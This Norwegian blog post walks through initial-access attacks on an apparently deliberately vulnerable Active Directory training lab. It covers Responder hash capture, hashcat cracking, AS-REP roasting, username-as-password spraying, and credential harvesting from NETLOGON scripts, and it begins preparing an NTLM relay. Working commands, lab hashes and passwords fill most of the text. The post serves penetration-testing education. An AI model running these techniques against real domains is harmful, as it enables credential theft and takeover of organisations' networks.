Game of Active Directory del 2 – Initial access
Forord: Denne bloggserien viser reelle metoder angripere bruker for å bevege seg inn i, og ta over et AD miljø. All denne informasjonen er allerede offentlig tilgjengelig, og deles ikke for å gi grunnkurs i nettkriminalitet, men for å spre kunnskap om hvorfor vi må beskytte oss. Du må kun benytte disse verktøyene, metodene og prosedyrene i miljøer der du har fått eksplisitt samtykke av eier til å gjøre dette.
Vi fortsetter fra Del 1 som tok for seg rekognosering.
I dette segmentet tar vi for oss “initial access” på systemer. Vi fokuserer på MITRE ATT&CK T1078.002 – Valid Accounts: Domain Accounts. Selv om vi allerede har passordet til Sam og hint om Arya, så skal vi utforske flere metoder i denne posten.
Responder
Dersom miljøet benytter NTLM-autentisering kan vi forsøke å stjele NTLM hasher fra nettverket. Disse kan man enten cracke offline for å finne kontopassordet. I mange tilfeller kan vi også utnytte en klassisk sårbarhet, og utføre såkalte relay-angrep der vi videresender hashen til en tjeneste uten å kunne passordet, og likevel kan vi bli autentisert som den kontoen mot en tjeneste.
Ettersom vi befinner oss på samme L2 broadcast domain som labben, kan vi kjøre et verktøy som heter Responder for å se om vi kan finne noen hasher.
$ sudo responder -I vxlan100 --analyze
[+] Listening for events...
[+] Responder is in analyze mode. No NBT-NS, LLMNR, MDNS requests will be poisoned Vi fanget opp hashen til NORTH\Eddard.Stark
eddard.stark::NORTH:1122334455667788:4162288F6FAE16F820EE1ACA1B5107B1:010100000000000000B67E510424DC01DACE8067C597868B00000000020008004B0050004F00490001001E00570049004E002D00350054004A0049004C0056005200500046003000440004003400570049004E002D00350054004A0049004C005600520050004600300044002E004B0050004F0049002E004C004F00430041004C00030014004B0050004F0049002E004C004F00430041004C00050014004B0050004F0049002E004C004F00430041004C000700080000B67E510424DC0106000400020000000800300030000000000000000000000000300000E7C75260965FFE977866685EBA6DB455FB9BB51E917A1CE3B28827603DE5A25C0A001000000000000000000000000000000000000900140063006900660073002F004D006500720065006E000000000000000000Og vi fanget også opp hashen til NORTH\robb.stark
robb.stark::NORTH:1122334455667788:74EE24F5B3AF42B688EFE560E8E7BDD5:010100000000000000B67E510424DC0124E1A6E0885399FD00000000020008004B0050004F00490001001E00570049004E002D00350054004A0049004C0056005200500046003000440004003400570049004E002D00350054004A0049004C005600520050004600300044002E004B0050004F0049002E004C004F00430041004C00030014004B0050004F0049002E004C004F00430041004C00050014004B0050004F0049002E004C004F00430041004C000700080000B67E510424DC0106000400020000000800300030000000000000000000000000300000E7C75260965FFE977866685EBA6DB455FB9BB51E917A1CE3B28827603DE5A25C0A001000000000000000000000000000000000000900160063006900660073002F0042007200610076006F0073000000000000000000Forsøker vi å cracke disse to oppfangede hashene med rockyou ordlista, ser vi at dette ikke lykkes for eddard.stark kontoen.
$ hashcat -m 5600 creds/eddard.stark.north.sevenkingdoms.local.ntlmv2 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
OpenCL API (OpenCL 3.0 PoCL 6.0+debian Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
====================================================================================================================================================
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.
Watchdog: Temperature abort trigger set to 90c
Host memory required for this attack: 1 MB
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
Cracking performance lower than expected?
* Append -O to the commandline.
This lowers the maximum supported password/salt length (usually down to 32).
* Append -w 3 to the commandline.
This can cause your screen to lag.
* Append -S to the commandline.
This has a drastic speed impact but can be better for specific attacks.
Typical scenarios are a small wordlist but a large ruleset.
* Update your backend API runtime / driver the right way:
https://hashcat.net/faq/wrongdriver
* Create more work items to make use of your parallelization power:
https://hashcat.net/faq/morework
Approaching final keyspace - workload adjusted.
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: EDDARD.STARK::NORTH:1122334455667788:4162288f6fae16...000000
Time.Started.....: Mon Sep 22 14:06:27 2025 (12 secs)
Time.Estimated...: Mon Sep 22 14:06:39 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 916.2 kH/s (1.82ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 0/1 (0.00%) Digests (total), 0/1 (0.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 67%
Started: Mon Sep 22 14:06:26 2025
Stopped: Mon Sep 22 14:06:41 2025Prøver vi derimot med robb.stark ser vi at vi finner passordet meget raskt. For å korte ned litt tar jeg ikke med alt av output fra hashcat, men vi ser på slutten her at passordet til robb.stark er “sexywolfy”.
ROBB.STARK::NORTH:1122334455667788:8085a38911a1dc543eb609d7dd13ec92:010100000000000080fd79cd0624dc01b9ab15d533d4516d0000000002000800490053004800420001001e00570049004e002d0049004e005600320042004d004700540031004a00540004003400570049004e002d0049004e005600320042004d004700540031004a0054002e0049005300480042002e004c004f00430041004c000300140049005300480042002e004c004f00430041004c000500140049005300480042002e004c004f00430041004c000700080080fd79cd0624dc0106000400020000000800300030000000000000000000000000300000e7c75260965ffe977866685eba6db455fb9bb51e917a1ce3b28827603de5a25c0a001000000000000000000000000000000000000900160063006900660073002f0042007200610076006f0073000000000000000000:sexywolfy
Vi har allerede den tilgangen vi trenger, egentlig, men vi ønsker også å se på andre sårbarheter.
AS-Rep Roasting
Et eksempel kan være å sjekke om vi kan AS-REP roaste brukerkontoer i lista vi fikk fra enum4linux i recon fasen.
AS-REP eller “Authentication Server Response” kan utnyttes dersom en konto er flagget “UF_DONT_REQUIRE_PREAUTH”.
Hvem som helst med nettverkstilgang vil kunne be om en såkalt “Ticket Granting Ticket” (TGT) fra Kerberos Key Distribution Center (KDC). Denne billetten (TGT) kan man bruke til å skaffe tjenestebilletter for å logge seg på gitte tjenester, som f.eks fileshares, remote desktop, el.l – men er kryptert med kontoens passord. Dermed kan vi forsøke å cracke passordet med et ordliste angrep, mot en kryptert TGT.
└─$ GetNPUsers.py -usersfile creds/userlist.north.sevenkingdoms.local -request -format hashcat -outputfile creds/north.asrep -dc-ip 10.3.2.11 'NORTH/'
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] User SEVENKINGDOMS$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User arya.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eddard.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User catelyn.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sansa.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$brandon.stark@NORTH:973db4ba589726bc964c68c804b487ce$d84f141daf8038225860954b00aee0578224ba0f052d99f0e575b0197f375f577d801bd6bb4784aa2d1d14693e8c7feb52331d1f97ce47cbd81f3114bcd88153e5fc492a6b9a42643043cae5cb79387b6d7f788d58fce52495b72c48c537668e8cb2d35c96117fb49f34ced19a3a39ff5552d9d0ef1ba74f8d022fe47b524b76b49da7e354a36588efa4e594fb0343a231c1702acd088c351280174df0963386635d2f43a8a249db4070e778185e08e73032856d523f68f2bf0028db72199fd145544ad180d3095126332b2d63acee31c6ce395be66ea84159371229c92f9f425e0bf5a126974d86d2c06919475f69965297
[-] User rickon.stark doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User hodor doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jon.snow doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User samwell.tarly doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jeor.mormont doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sql_svc doesn't have UF_DONT_REQUIRE_PREAUTH setVi har altså klart å AS-REP roaste brukeren til NORTH\Brandon.Stark, noe som innebærer at vi har fått tak i en kerberos ticket kryptert med hans passord. Det betyr at vi kan forsøke å cracke passordet til denne kontoen.
Password spraying
Videre kan vi forsøke å gjette passord mot kontoer. Det er ikke helt uvanlig at brukernavn = passord, som f.eks i admin/admin standardpålogginger og lignende.
─$ for p in $(cat creds/userlist.north.sevenkingdoms.local); do netexec smb 10.3.2.0/24 -u $p -p $p; done
Running nxc against 256 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
SMB 10.3.2.12 445 MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 10.3.2.12 445 MEEREEN [-] essos.local\hodor:hodor STATUS_LOGON_FAILURE
SMB 10.3.2.23 445 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 10.3.2.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMB>
SMB 10.3.2.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False>
SMB 10.3.2.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) >
SMB 10.3.2.23 445 BRAAVOS [+] essos.local\hodor:hodor (Guest)
SMB 10.3.2.10 445 KINGSLANDING [-] sevenkingdoms.local\hodor:hodor STATUS_LOGON_FAILURE
SMB 10.3.2.22 445 CASTELBLACK [+] north.sevenkingdoms.local\hodor:hodor
SMB 10.3.2.11 445 WINTERFELL [+] north.sevenkingdoms.local\hodor:hodorSom vi ser er hodor:hodor akseptert på winterfell og castelblack, men på braavos har vi kun gjestetilgang, fordi han eksisterer ikke i essos\ domenet.
Tidligere fikk vi også et hint om at NORTH\arya.stark sitt passord kanskje kunne være “Needle”.
$ netexec smb --shares 10.3.2.10-30 -u "arya.stark" -p "Needle"
SMB 10.3.2.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.3.2.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.3.2.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 10.3.2.10 445 KINGSLANDING [-] sevenkingdoms.local\arya.stark:Needle STATUS_LOGON_FAILURE
SMB 10.3.2.23 445 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 10.3.2.12 445 MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 10.3.2.11 445 WINTERFELL [+] north.sevenkingdoms.local\arya.stark:Needle
SMB 10.3.2.22 445 CASTELBLACK [+] north.sevenkingdoms.local\arya.stark:Needle
SMB 10.3.2.23 445 BRAAVOS [+] essos.local\arya.stark:Needle (Guest)
SMB 10.3.2.12 445 MEEREEN [-] essos.local\arya.stark:Needle STATUS_LOGON_FAILURE
SMB 10.3.2.11 445 WINTERFELL [*] Enumerated shares
SMB 10.3.2.11 445 WINTERFELL Share Permissions Remark
SMB 10.3.2.11 445 WINTERFELL ----- ----------- ------
SMB 10.3.2.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 10.3.2.11 445 WINTERFELL C$ Default share
SMB 10.3.2.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 10.3.2.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 10.3.2.11 445 WINTERFELL SYSVOL READ Logon server share
SMB 10.3.2.22 445 CASTELBLACK [*] Enumerated shares
SMB 10.3.2.22 445 CASTELBLACK Share Permissions Remark
SMB 10.3.2.22 445 CASTELBLACK ----- ----------- ------
SMB 10.3.2.22 445 CASTELBLACK ADMIN$ Remote Admin
SMB 10.3.2.22 445 CASTELBLACK all READ,WRITE Basic RW share for all
SMB 10.3.2.22 445 CASTELBLACK C$ Default share
SMB 10.3.2.22 445 CASTELBLACK IPC$ READ Remote IPC
SMB 10.3.2.22 445 CASTELBLACK public READ,WRITE Basic Read share for all domain users
SMB 10.3.2.23 445 BRAAVOS [*] Enumerated shares
SMB 10.3.2.23 445 BRAAVOS Share Permissions Remark
SMB 10.3.2.23 445 BRAAVOS ----- ----------- ------
SMB 10.3.2.23 445 BRAAVOS ADMIN$ Remote Admin
SMB 10.3.2.23 445 BRAAVOS all READ,WRITE Basic RW share for all
SMB 10.3.2.23 445 BRAAVOS C$ Default share
SMB 10.3.2.23 445 BRAAVOS CertEnroll Active Directory Certificate Services share
SMB 10.3.2.23 445 BRAAVOS IPC$ READ Remote IPC
SMB 10.3.2.23 445 BRAAVOS public Basic Read share for all domain users
Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
Vi ser at vi igjen får tilgang til castelblack og winterfell med north\arya.stark og passordet “Needle”, men her får vi også tilgang til Braavos serveren i essos.local som essos\arya.stark, istedenfor som gjest denne gangen.
Fra rekognoseringen i forrige bloggpost kunne vi også lese i beskrivelsen til Samwell Tarly at passordet skulle være Heartsbane. Vi prøver det også:
$ netexec smb --shares 10.3.2.10-30 -u "samwell.tarly" -p "Heartsbane"
SMB 10.3.2.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.3.2.12 445 MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 10.3.2.23 445 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 10.3.2.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.3.2.10 445 KINGSLANDING [-] sevenkingdoms.local\samwell.tarly:Heartsbane STATUS_LOGON_FAILURE
SMB 10.3.2.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 10.3.2.12 445 MEEREEN [-] essos.local\samwell.tarly:Heartsbane STATUS_LOGON_FAILURE
SMB 10.3.2.23 445 BRAAVOS [+] essos.local\samwell.tarly:Heartsbane (Guest)
SMB 10.3.2.11 445 WINTERFELL [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SMB 10.3.2.22 445 CASTELBLACK [+] north.sevenkingdoms.local\samwell.tarly:Heartsbane
SMB 10.3.2.23 445 BRAAVOS [*] Enumerated shares
SMB 10.3.2.23 445 BRAAVOS Share Permissions Remark
SMB 10.3.2.23 445 BRAAVOS ----- ----------- ------
SMB 10.3.2.23 445 BRAAVOS ADMIN$ Remote Admin
SMB 10.3.2.23 445 BRAAVOS all READ,WRITE Basic RW share for all
SMB 10.3.2.23 445 BRAAVOS C$ Default share
SMB 10.3.2.23 445 BRAAVOS CertEnroll Active Directory Certificate Services share
SMB 10.3.2.23 445 BRAAVOS IPC$ READ Remote IPC
SMB 10.3.2.23 445 BRAAVOS public Basic Read share for all domain users
SMB 10.3.2.11 445 WINTERFELL [*] Enumerated shares
SMB 10.3.2.11 445 WINTERFELL Share Permissions Remark
SMB 10.3.2.11 445 WINTERFELL ----- ----------- ------
SMB 10.3.2.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 10.3.2.11 445 WINTERFELL C$ Default share
SMB 10.3.2.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 10.3.2.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 10.3.2.11 445 WINTERFELL SYSVOL READ Logon server share
SMB 10.3.2.22 445 CASTELBLACK [*] Enumerated shares
SMB 10.3.2.22 445 CASTELBLACK Share Permissions Remark
SMB 10.3.2.22 445 CASTELBLACK ----- ----------- ------
SMB 10.3.2.22 445 CASTELBLACK ADMIN$ Remote Admin
SMB 10.3.2.22 445 CASTELBLACK all READ,WRITE Basic RW share for all
SMB 10.3.2.22 445 CASTELBLACK C$ Default share
SMB 10.3.2.22 445 CASTELBLACK IPC$ READ Remote IPC
SMB 10.3.2.22 445 CASTELBLACK public READ,WRITE Basic Read share for all domain users
Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00Prøver vi samme metoden med robb.stark og sexywolfy får vi et svært lovende resultat:
$ netexec smb --shares 10.3.2.10-30 -u "robb.stark" -p "sexywolfy"
SMB 10.3.2.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.3.2.12 445 MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 10.3.2.23 445 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 10.3.2.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 10.3.2.10 445 KINGSLANDING [-] sevenkingdoms.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE
SMB 10.3.2.12 445 MEEREEN [-] essos.local\robb.stark:sexywolfy STATUS_LOGON_FAILURE
SMB 10.3.2.23 445 BRAAVOS [+] essos.local\robb.stark:sexywolfy (Guest)
SMB 10.3.2.22 445 CASTELBLACK [+] north.sevenkingdoms.local\robb.stark:sexywolfy
SMB 10.3.2.23 445 BRAAVOS [*] Enumerated shares
SMB 10.3.2.23 445 BRAAVOS Share Permissions Remark
SMB 10.3.2.23 445 BRAAVOS ----- ----------- ------
SMB 10.3.2.23 445 BRAAVOS ADMIN$ Remote Admin
SMB 10.3.2.23 445 BRAAVOS all READ,WRITE Basic RW share for all
SMB 10.3.2.23 445 BRAAVOS C$ Default share
SMB 10.3.2.23 445 BRAAVOS CertEnroll Active Directory Certificate Services share
SMB 10.3.2.23 445 BRAAVOS IPC$ READ Remote IPC
SMB 10.3.2.23 445 BRAAVOS public Basic Read share for all domain users
SMB 10.3.2.22 445 CASTELBLACK [*] Enumerated shares
SMB 10.3.2.22 445 CASTELBLACK Share Permissions Remark
SMB 10.3.2.22 445 CASTELBLACK ----- ----------- ------
SMB 10.3.2.22 445 CASTELBLACK ADMIN$ Remote Admin
SMB 10.3.2.22 445 CASTELBLACK all READ,WRITE Basic RW share for all
SMB 10.3.2.22 445 CASTELBLACK C$ Default share
SMB 10.3.2.22 445 CASTELBLACK IPC$ READ Remote IPC
SMB 10.3.2.22 445 CASTELBLACK public READ,WRITE Basic Read share for all domain users
SMB 10.3.2.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.3.2.11 445 WINTERFELL [+] north.sevenkingdoms.local\robb.stark:sexywolfy (Pwn3d!)
SMB 10.3.2.11 445 WINTERFELL [*] Enumerated shares
SMB 10.3.2.11 445 WINTERFELL Share Permissions Remark
SMB 10.3.2.11 445 WINTERFELL ----- ----------- ------
SMB 10.3.2.11 445 WINTERFELL ADMIN$ READ,WRITE Remote Admin
SMB 10.3.2.11 445 WINTERFELL C$ READ,WRITE Default share
SMB 10.3.2.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 10.3.2.11 445 WINTERFELL NETLOGON READ,WRITE Logon server share
SMB 10.3.2.11 445 WINTERFELL SYSVOL READ,WRITE Logon server share
Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00Vi har altså full admintilgang på Winterfell DCen allerede nå, men vi skal se på et par ting til før vi gir oss med initial access temaet.
Det første jeg vil demonstrere er hvordan vi kan lete etter informasjon i bl.a. gruppepolicy.
Tar vi utgangspunkt i tilgangen vi får med bare hodor:hodor kan vi f.eks se at vi har leserettigheter på SYSVOL og NETLOGON filområdene på domenekontrolleren.
SMB 10.3.2.11 445 WINTERFELL [*] Enumerated shares
SMB 10.3.2.11 445 WINTERFELL Share Permissions Remark
SMB 10.3.2.11 445 WINTERFELL ----- ----------- ------
SMB 10.3.2.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 10.3.2.11 445 WINTERFELL C$ Default share
SMB 10.3.2.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 10.3.2.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 10.3.2.11 445 WINTERFELL SYSVOL READ Logon server share Vi bruker verktøyet SMBClient til å koble på winterfell’s NETLOGON share som hodor med passordet hodor.
$ smbclient //winterfell.north.sevenkingdoms.local/NETLOGON -U "hodor"
Password for [WORKGROUP\hodor]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Mon Sep 22 14:08:35 2025
.. D 0 Mon Sep 22 14:08:35 2025
script.ps1 A 165 Thu Sep 11 15:04:32 2025
secret.ps1 A 869 Thu Sep 11 15:04:34 2025
15638527 blocks of size 4096. 9445328 blocks available
smb: \> mget *
Get file script.ps1? yes
getting file \script.ps1 of size 165 as script.ps1 (5.2 KiloBytes/sec) (average 5.2 KiloBytes/sec)
Get file secret.ps1? yes
getting file \secret.ps1 of size 869 as secret.ps1 (22.3 KiloBytes/sec) (average 14.6 KiloBytes/sec)
smb: \> exitVi har funnet to spennende filer – script.ps1 og secret.ps1 som kan være veldig lovende.
Ser vi på innholdet i script.ps1 finner vi påloggingsinformasjonen til jeor.mormont.
$ cat script.ps1
# fake script in netlogon with creds
$task = '/c TODO'
$taskName = "fake task"
$user = "NORTH\jeor.mormont"
$password = "_L0ngCl@w_"
# passwords in sysvol still ... Vi kan sjekke om det stemmer med netexec:
$ netexec smb --shares 10.3.2.10-30 -u "jeor.mormont" -p "_L0ngCl@w_"
SMB 10.3.2.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 10.3.2.23 445 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
SMB 10.3.2.12 445 MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 10.3.2.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.3.2.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.3.2.22 445 CASTELBLACK [+] north.sevenkingdoms.local\jeor.mormont:_L0ngCl@w_ (Pwn3d!)
SMB 10.3.2.23 445 BRAAVOS [+] essos.local\jeor.mormont:_L0ngCl@w_ (Guest)
SMB 10.3.2.12 445 MEEREEN [-] essos.local\jeor.mormont:_L0ngCl@w_ STATUS_LOGON_FAILURE
SMB 10.3.2.10 445 KINGSLANDING [-] sevenkingdoms.local\jeor.mormont:_L0ngCl@w_ STATUS_LOGON_FAILURE
SMB 10.3.2.11 445 WINTERFELL [+] north.sevenkingdoms.local\jeor.mormont:_L0ngCl@w_
SMB 10.3.2.23 445 BRAAVOS [*] Enumerated shares
SMB 10.3.2.23 445 BRAAVOS Share Permissions Remark
SMB 10.3.2.23 445 BRAAVOS ----- ----------- ------
SMB 10.3.2.23 445 BRAAVOS ADMIN$ Remote Admin
SMB 10.3.2.23 445 BRAAVOS all READ,WRITE Basic RW share for all
SMB 10.3.2.23 445 BRAAVOS C$ Default share
SMB 10.3.2.23 445 BRAAVOS CertEnroll Active Directory Certificate Services share
SMB 10.3.2.23 445 BRAAVOS IPC$ READ Remote IPC
SMB 10.3.2.23 445 BRAAVOS public Basic Read share for all domain users
SMB 10.3.2.11 445 WINTERFELL [*] Enumerated shares
SMB 10.3.2.11 445 WINTERFELL Share Permissions Remark
SMB 10.3.2.11 445 WINTERFELL ----- ----------- ------
SMB 10.3.2.11 445 WINTERFELL ADMIN$ Remote Admin
SMB 10.3.2.11 445 WINTERFELL C$ Default share
SMB 10.3.2.11 445 WINTERFELL IPC$ READ Remote IPC
SMB 10.3.2.11 445 WINTERFELL NETLOGON READ Logon server share
SMB 10.3.2.11 445 WINTERFELL SYSVOL READ Logon server share
SMB 10.3.2.22 445 CASTELBLACK [*] Enumerated shares
SMB 10.3.2.22 445 CASTELBLACK Share Permissions Remark
SMB 10.3.2.22 445 CASTELBLACK ----- ----------- ------
SMB 10.3.2.22 445 CASTELBLACK ADMIN$ READ,WRITE Remote Admin
SMB 10.3.2.22 445 CASTELBLACK all READ,WRITE Basic RW share for all
SMB 10.3.2.22 445 CASTELBLACK C$ READ,WRITE Default share
SMB 10.3.2.22 445 CASTELBLACK IPC$ READ Remote IPC
SMB 10.3.2.22 445 CASTELBLACK public READ,WRITE Basic Read share for all domain users
Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00Det fungerte fint, men vi har enda en fil å sjekke ut – secret.ps1
$ cat secret.ps1
# cypher script
# $domain="sevenkingdoms.local"
# $EncryptionKeyBytes = New-Object Byte[] 32
# [Security.Cryptography.RNGCryptoServiceProvider]::Create().GetBytes($EncryptionKeyBytes)
# $EncryptionKeyBytes | Out-File "encryption.key"
# $EncryptionKeyData = Get-Content "encryption.key"
# Read-Host -AsSecureString | ConvertFrom-SecureString -Key $EncryptionKeyData | Out-File -FilePath "secret.encrypted"
# secret stored :
$keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91
$secret="76492d1116743f0423413b16050a5345MgB8AGkAcwBDACsAUwArADIAcABRAEcARABnAGYAMwA3AEEAcgBFAEIAYQB2AEEAPQA9AHwAZQAwADgANAA2ADQAMABiADYANAAwADYANgA1ADcANgAxAGIAMQBhAGQANQBlAGYAYQBiADQAYQA2ADkAZgBlAGQAMQAzADAANQAyADUAMgAyADYANAA3ADAAZABiAGEAOAA0AGUAOQBkAGMAZABmAGEANAAyADkAZgAyADIAMwA="
# T.L. Her har vi altså et powershell script, som definerer noen variabler. Den tar inn et passord, konverterer det med nøkkeldata, og lagrer et kryptert passord.
Vi kan prøve å reversere prosessen ved å ta det krypterte passordet, og dekryptere det med nøkkeldataene som ligger i scriptet.
$keyData = 177, 252, 228, 64, 28, 91, 12, 201, 20, 91, 21, 139, 255, 65, 9, 247, 41, 55, 164, 28, 75, 132, 143, 71, 62, 191, 211, 61, 154, 61, 216, 91
$secureString = ConvertTo-SecureString $secret -Key $keyData
$plain = [System.Net.NetworkCredential]::new("", $secureString).Password
Write-Host "Decrypted secret: $plain"Dette gir resultatet: powerkingftw135
Vi har altså en ukjent bruker, signert “T.L”, med passord powerkingftw135
NTLM Relay
Fordi vi ikke klarte å knekke passordet til Eddard Stark, så skal vi prøve å logge inn uten å kunne passordet. Dette angrepet kalles et NTLM Relay angrep.
Først har vi behov for en liste med verter som ikke krever SMB-signering, slik at vi kan forfalske opphavet til en autentiseringsforespørsel.
$ netexec smb 10.3.2.10-30 --gen-relay-list ntlmrelay.netexec
SMB 10.3.2.12 445 MEEREEN [*] Windows 10 / Server 2016 Build 14393 x64 (name:MEEREEN) (domain:essos.local) (signing:True) (SMBv1:True)
SMB 10.3.2.10 445 KINGSLANDING [*] Windows 10 / Server 2019 Build 17763 x64 (name:KINGSLANDING) (domain:sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.3.2.11 445 WINTERFELL [*] Windows 10 / Server 2019 Build 17763 x64 (name:WINTERFELL) (domain:north.sevenkingdoms.local) (signing:True) (SMBv1:False)
SMB 10.3.2.22 445 CASTELBLACK [*] Windows 10 / Server 2019 Build 17763 x64 (name:CASTELBLACK) (domain:north.sevenkingdoms.local) (signing:False) (SMBv1:False)
SMB 10.3.2.23 445 BRAAVOS [*] Windows 10 / Server 2016 Build 14393 x64 (name:BRAAVOS) (domain:essos.local) (signing:False) (SMBv1:True)
Running nxc against 21 targets ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━ 100% 0:00:00
